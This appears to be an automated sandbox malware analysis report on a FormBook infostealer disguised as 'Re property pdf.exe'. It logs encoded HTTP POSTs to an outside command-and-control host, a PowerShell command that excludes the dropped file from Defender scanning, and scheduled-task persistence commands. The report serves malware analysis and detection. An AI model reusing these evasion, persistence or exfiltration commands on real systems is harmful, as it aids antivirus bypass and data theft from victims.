                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            x-hcdn-request-id: 7f7c8e2ab29aa6ddd920d017a44674e4-phx-edge5
                                                                                                                            Expires: Sat, 19 Oct 2024 10:59:57 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 50056 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 13:00:03.721625090 CEST | 860 | OUT | POST /a57a/ HTTP/1.1
                                                                                                                            Host: www.jsninja.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.jsninja.net
                                                                                                                            Referer: http://www.jsninja.net/a57a/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=jdpQGSVl5v7sK758OXdo0u6ukjPFK7BnDH5BQp0oBi0dbd6sJw/K5NnuraR0fKBvc1mclyqKdzwIzNmm+rlGcgAJW75+58ZoKwdydsclFNA8AO2sDydscVM+h4zhsNSuZGf8x22F2WbnbKSKKRc6vKXJrIFrAbMyZYRwnxqrxq+td5h1mBnKboV0QJsMeJ5m2w==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 50057 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 13:00:06.939129114 CEST | 880 | OUT | POST /a57a/ HTTP/1.1
                                                                                                                            Host: www.jsninja.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.jsninja.net
                                                                                                                            Referer: http://www.jsninja.net/a57a/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=jdpQGSVl5v7sKbJ8IEFoyO6toDPFAbAuDAxBQow4BwAdc/isIx/K6Nnuk6RxRqBkc1iUlwOKdzkIzP+m+8xFcwAxdb583cZoKwdydvhOFNY8A7+sCQ5vW1M9oYzhoNSqZGeZx3qv2UjnbKCKKAc5kKXL1IELGJtdd9x8o3+JuePOY/wv3wGdJoxHNOl4TKEvt7KWVLU/QFkaMxhNbBM6oLU=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 50058 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 13:00:09.557213068 CEST | 10962 | OUT | POST /a57a/ HTTP/1.1
                                                                                                                            Host: www.jsninja.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.jsninja.net
                                                                                                                            Referer: http://www.jsninja.net/a57a/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 50059 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 13:00:12.732429981 CEST | 594 | OUT | GET /a57a/?2BWDG=ufBwFiprob3VF6k6UE1279W30zXHAcoAMQ5DA8EncRwSSdWTAgjp/PT6qbRvKZhyWw7OmhD3dggL59zyh6BsMWoIasJTvdtYPi0tEctyZ7U7D7SOHDVEOnk=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.jsninja.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Oct 19, 2024 13:00:13.328516960 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 11:00:13 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2BWDG=ufBwFiprob3VF6k6UE1279W30zXHAcoAMQ5DA8EncRwSSdWTAgjp/PT6qbRvKZhyWw7OmhD3dggL59zyh6BsMWoIasJTvdtYPi0tEctyZ7U7D7SOHDVEOnk=&wfm=G6oTo8vx"}</script></head></html>


                                                                                                                            Target ID:0
                                                                                                                            Start time:06:56:07
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\Re property pdf.exe"
                                                                                                                            Imagebase:0x910000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:2
                                                                                                                            Start time:06:56:09
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
                                                                                                                            Imagebase:0xa80000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:06:56:09
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:4
                                                                                                                            Start time:06:56:09
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp"
                                                                                                                            Imagebase:0x610000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:5
                                                                                                                            Start time:06:56:09
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:06:56:10
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\Re property pdf.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:7
                                                                                                                            Start time:06:56:10
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            Imagebase:0xa40000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:06:56:11
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                                            File size:496'640 bytes
                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:9
                                                                                                                            Start time:06:56:15
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp"
                                                                                                                            Imagebase:0x610000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:10
                                                                                                                            Start time:06:56:15
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:11
                                                                                                                            Start time:06:56:15
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
                                                                                                                            Imagebase:0x180000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:12
                                                                                                                            Start time:06:56:15
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
                                                                                                                            Imagebase:0xbf0000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:16
                                                                                                                            Start time:06:56:43
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe"
                                                                                                                            Imagebase:0xc20000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:17
                                                                                                                            Start time:06:56:45
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\PresentationHost.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\SysWOW64\PresentationHost.exe"
                                                                                                                            Imagebase:0x60000
                                                                                                                            File size:256'000 bytes
                                                                                                                            MD5 hash:C6671F8B9F073785FD617661AD1F1C45
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            Target ID:18
                                                                                                                            Start time:06:57:08
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                            File size:676'768 bytes
                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true


                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:12%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:1.8%
                                                                                                                              Total number of Nodes:340
                                                                                                                              Total number of Limit Nodes:12

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795524867.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 074F0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1795495475.00000000074F0000.00000004.08000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_74f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Hjq$Hjq$Hjq$Hjq$Hjq
                                                                                                                              • API String ID: 0-1529018591
                                                                                                                              • Opcode ID: 11e4456c87c30083ae25cb8d9fd61c0d28e5bd5f0d33859a3839016bfc77ff3a
                                                                                                                              • Instruction ID: 1f2130137691a81a063f2772951740e6408e02cab0b4699b2f15d2ea5ffc03bb
                                                                                                                              • Opcode Fuzzy Hash: 11e4456c87c30083ae25cb8d9fd61c0d28e5bd5f0d33859a3839016bfc77ff3a
                                                                                                                              • Instruction Fuzzy Hash: F5326EB1E002598FDB54DFA8C8947AEBBB2BF84300F14856AD409AB395DF349D85CF91

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: H
                                                                                                                              • API String ID: 0-2852464175
                                                                                                                              • Opcode ID: b9d0975d3d6b765c7039a6467c4ddc992485d76bdec345136309abefc72d6324
                                                                                                                              • Instruction ID: 73334c5ab1a3e41ca037c55f2390da92e560a7b2d7c1060a95aaf5cbac4f920c
                                                                                                                              • Opcode Fuzzy Hash: b9d0975d3d6b765c7039a6467c4ddc992485d76bdec345136309abefc72d6324
                                                                                                                              • Instruction Fuzzy Hash: 6822DCB07012158FDB19DBA9C5A0BAEB7F6AF89344F258469E516DB391CF30EC02CB51
                                                                                                                              APIs
                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 07724CED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SectionUnmapView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 498011366-0
                                                                                                                              • Opcode ID: 98af118ae57d7d6c63fd98d2c6ccb653df2c2fd85f262ff6b23be8bb706e3108
                                                                                                                              • Instruction ID: fcd25eabe9e2b6234568d86392345da2afc1ec6e9019478de3f1c9f8efc83760
                                                                                                                              • Opcode Fuzzy Hash: 98af118ae57d7d6c63fd98d2c6ccb653df2c2fd85f262ff6b23be8bb706e3108
                                                                                                                              • Instruction Fuzzy Hash: 431167B59003498ECB20CFAAC445BEEFFF5AB88324F248419D419A7210C775A945DB95
                                                                                                                              APIs
                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 07724CED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SectionUnmapView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 498011366-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0772922D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID: Ak^
                                                                                                                              • API String ID: 410705778-2227433594

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07724F76
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07724F76
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0130AFFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052F1A02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052F1A02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 052F4101
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
